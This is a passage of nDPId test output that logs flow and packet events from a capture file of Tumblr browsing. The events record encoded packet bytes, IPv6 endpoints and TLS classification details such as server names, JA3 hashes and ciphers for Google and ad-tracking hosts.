+00512{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":23650,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":43,"flow_packet_id":2,"flow_last_seen":1605292122094,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605292122094,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPSoAFFBABwgJAAAAAAAAIA4qAcsBIEmLB5kd7IUo3\/YpAbvBjCTTL5FAHmhqoBJXgI\/cAAACBAV4AQMDAwQCCArC3d\/Z2Fs6HQ=="} 
+00497{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":23654,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":43,"flow_packet_id":3,"flow_last_seen":1605292122094,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605292122094,"pkt":"qtsDr8lk5EKm5WPyht1gAy+bACAGQCoBywEgSYsHmR3shSjf9ikqABRQQAcICQAAAAAAACAOwYwBu0AeaGok0y+SgBAB+xPQAAABAQgK2Fs6O8Ld39k="} +00952{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":23657,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605292122064,"flow_last_seen":1605292122094,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605292122094,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:809::200e","src_port":49548,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"apis.google.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 
+00617{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":23664,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605292122095,"flow_last_seen":1605292122095,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1605292122095,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:80b::200a","src_port":38608,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00509{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":23664,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":44,"flow_packet_id":1,"flow_last_seen":1605292122095,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605292122095,"pkt":"qtsDr8lk5EKm5WPyht1gD2uVACgGQCoBywEgSYsHmR3shSjf9ikqABRQQAcICwAAAAAAACAKltABu4i5CzgAAAAAoAL9IPiAAAACBAWgBAIIChLBJ8gAAAAAAQMDBw=="} +00677{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":23851,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1605292102602,"flow_last_seen":1605292122118,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":16900,"flow_avg_l4_payload_len":528,"midstream":1,"thread_ts_msec":1605292122118,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:789d","src_port":48240,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} 
+00678{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":23851,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1605292102602,"flow_last_seen":1605292122118,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":16900,"flow_avg_l4_payload_len":528,"midstream":1,"thread_ts_msec":1605292122118,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:789d","src_port":48240,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} +00511{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":24118,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":44,"flow_packet_id":2,"flow_last_seen":1605292122163,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605292122163,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPSoAFFBABwgLAAAAAAAAIAoqAcsBIEmLB5kd7IUo3\/YpAbuW0O3zbp+IuQs5oBJXgJ7NAAACBAV4AQMDAwQCCArC3d\/9EsEnyA=="} +00498{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":24126,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":44,"flow_packet_id":3,"flow_last_seen":1605292122163,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605292122163,"pkt":"qtsDr8lk5EKm5WPyht1gD2uVACAGQCoBywEgSYsHmR3shSjf9ikqABRQQAcICwAAAAAAACAKltABu4i5Cznt826ggBAB+yKbAAABAQgKEsEoDMLd3\/0="} 
+00964{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":24188,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605292122095,"flow_last_seen":1605292122163,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605292122163,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:80b::200a","src_port":38608,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.GoogleServices","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"ajax.googleapis.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00993{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":24239,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605292122064,"flow_last_seen":1605292122177,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":1725,"flow_avg_l4_payload_len":287,"midstream":0,"thread_ts_msec":1605292122177,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:809::200e","src_port":49548,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"apis.google.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 
+01005{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":24429,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605292122095,"flow_last_seen":1605292122212,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":1725,"flow_avg_l4_payload_len":287,"midstream":0,"thread_ts_msec":1605292122212,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:80b::200a","src_port":38608,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.GoogleServices","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"ajax.googleapis.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00657{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":24626,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":42,"flow_packet_id":3,"flow_last_seen":1605292122439,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":203,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":203,"pkt_l4_len":149,"thread_ts_msec":1605292122439,"pkt":"qtsDr8lk5EKm5WPyht1gDKQRAJUGQCoBywEgSYsHmR3shSjf9ikqABRQQAcIFwAAAAAAACAK2QgBu\/13v3+ZlfzugBgB9aL3AAABAQgKG7m5ccLd3lMXAwMAcFVxaXihuhejZCNpZ5nuv6bEN9Yj5XMBxAt2QHwyRgmT6ybDwC5C73DyglYgxmIhMzt282zpUtE5GphT7ONBXskP6qssi1eNQHysgmBFeTvR+6kSeL0yhYhtFPIEYfWd8KPo3wOHIQIgFNXMNqMrZ9Q="} 
+00585{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":24657,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":3,"flow_last_seen":1605292122501,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":149,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":149,"pkt_l4_len":95,"thread_ts_msec":1605292122501,"pkt":"qtsDr8lk5EKm5WPyht1gBEqMAF8GQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAABo9CrI3c4Bu\/+MQoadXXNVgBgB9QaPAAABAQgKTYUvYcLdm\/0XAwMAOgAAAAAAAAAIvZM7k4G8cjK7Q9\/YrVI4eMbPvi74lWEwjtUtgcQJsZEKgX5x1KPe5+ARIWOSp6YRK8o="} +00610{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":24688,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605292122674,"flow_last_seen":1605292122674,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1605292122674,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::6006:749","src_port":39164,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00509{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":24688,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":45,"flow_packet_id":1,"flow_last_seen":1605292122674,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605292122674,"pkt":"qtsDr8lk5EKm5WPyht1gD3A1ACgGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAABgBgdJmPwBuzwV9u8AAAAAoAL9IJXTAAACBAWgBAIIChNnJ60AAAAAAQMDBw=="} 
+00512{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":24691,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":45,"flow_packet_id":2,"flow_last_seen":1605292122697,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605292122697,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPQBk\/5sAAAAAAAAAAGAGB0kqAcsBIEmLB5kd7IUo3\/YpAbuY\/FghbGM8FfbwoBJXgNHxAAACBAV4AQMDAwQCCArC3eI6E2cnrQ=="} +00497{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":24692,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":45,"flow_packet_id":3,"flow_last_seen":1605292122698,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605292122698,"pkt":"qtsDr8lk5EKm5WPyht1gD3A1ACAGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAABgBgdJmPwBuzwV9vBYIWxkgBAB+1XrAAABAQgKE2cnxcLd4jo="} +00951{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":24693,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605292122674,"flow_last_seen":1605292122698,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":620,"flow_tot_l4_payload_len":620,"flow_avg_l4_payload_len":155,"midstream":0,"thread_ts_msec":1605292122698,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::6006:749","src_port":39164,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Advertisement"},"tls": {"version":"TLSv1.2","client_requested_server_name":"sb.scorecardresearch.com","ja3":"44d502d471cfdb99c59bdfb0f220e5a8","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 
+00611{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":24694,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605292122698,"flow_last_seen":1605292122698,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605292122698,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::4a72:9a15","src_port":42674,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00497{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":24694,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":46,"flow_packet_id":1,"flow_last_seen":1605292122698,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605292122698,"pkt":"qtsDr8lk5EKm5WPyht1gCuvGACAGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAABKcpoVprIBu3ASIMYXhL6qgBAB9S93AAABAQgKNSTnjcLdLMU="} +00499{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":24706,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":46,"flow_packet_id":2,"flow_last_seen":1605292122741,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605292122741,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACAGPQBk\/5sAAAAAAAAAAEpymhUqAcsBIEmLB5kd7IUo3\/YpAbumsheEvqpwEiDHgBALdyXtAAABAQgKwt3iZjUkMfM="} 
+00990{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":24707,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605292122674,"flow_last_seen":1605292122755,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":620,"flow_tot_l4_payload_len":890,"flow_avg_l4_payload_len":148,"midstream":0,"thread_ts_msec":1605292122755,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::6006:749","src_port":39164,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Advertisement"},"tls": {"version":"TLSv1.3","client_requested_server_name":"sb.scorecardresearch.com","ja3":"44d502d471cfdb99c59bdfb0f220e5a8","ja3s":"2253c82f03b621c5144709b393fde2c9","unsafe_cipher":0,"cipher":"TLS_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00617{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":24733,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605292122874,"flow_last_seen":1605292122874,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605292122874,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:80a::200a","src_port":40190,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00498{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":24733,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":47,"flow_packet_id":1,"flow_last_seen":1605292122874,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605292122874,"pkt":"qtsDr8lk5EKm5WPyht1gDJQ7ACAGQCoBywEgSYsHmR3shSjf9ikqABRQQAcICgAAAAAAACAKnP4Bu4CgSN\/gvLosgBAB9qrlAAABAQgK1OQQnsLdMvM="} +00499{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":47,"flow_packet_id":2,"flow_last_seen":1605292122899,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605292122899,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACAGPSoAFFBABwgKAAAAAAAAIAoqAcsBIEmLB5kd7IUo3\/YpAbuc\/uC8uiyAoEjggBALQrp6AAABAQgKwt3jAtThR68="} +00674{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605292118714,"flow_last_seen":1605292118786,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:811::2004","src_port":48988,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} 
+00618{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605292118714,"flow_last_seen":1605292118786,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:811::2004","src_port":48988,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00674{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605292120654,"flow_last_seen":1605292120853,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:811::2004","src_port":49002,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} +00618{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605292120654,"flow_last_seen":1605292120853,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:811::2004","src_port":49002,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00691{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":1605292103804,"flow_last_seen":1605292104013,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":664,"flow_tot_l4_payload_len":1202,"flow_avg_l4_payload_len":133,"midstream":1,"thread_ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2620:116:800d:21:8c6e:cf2c:8d6:9fb5","src_port":41266,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} +00635{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":1605292103804,"flow_last_seen":1605292104013,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":664,"flow_tot_l4_payload_len":1202,"flow_avg_l4_payload_len":133,"midstream":1,"thread_ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2620:116:800d:21:8c6e:cf2c:8d6:9fb5","src_port":41266,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00717{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":76,"flow_first_seen":1605292102602,"flow_last_seen":1605292122470,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":35234,"flow_avg_l4_payload_len":463,"midstream":1,"thread_ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:789d","src_port":48240,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": 
{"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} +00668{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605292114506,"flow_last_seen":1605292114736,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56558,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} +00612{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605292114506,"flow_last_seen":1605292114736,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56558,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00668{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605292108746,"flow_last_seen":1605292108796,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56564,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by 
port"},"proto":"TLS","breed":"Safe","category":"Web"}} +00612{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605292108746,"flow_last_seen":1605292108796,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56564,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00668{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605292108747,"flow_last_seen":1605292108805,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56578,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} +00612{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605292108747,"flow_last_seen":1605292108805,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56578,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
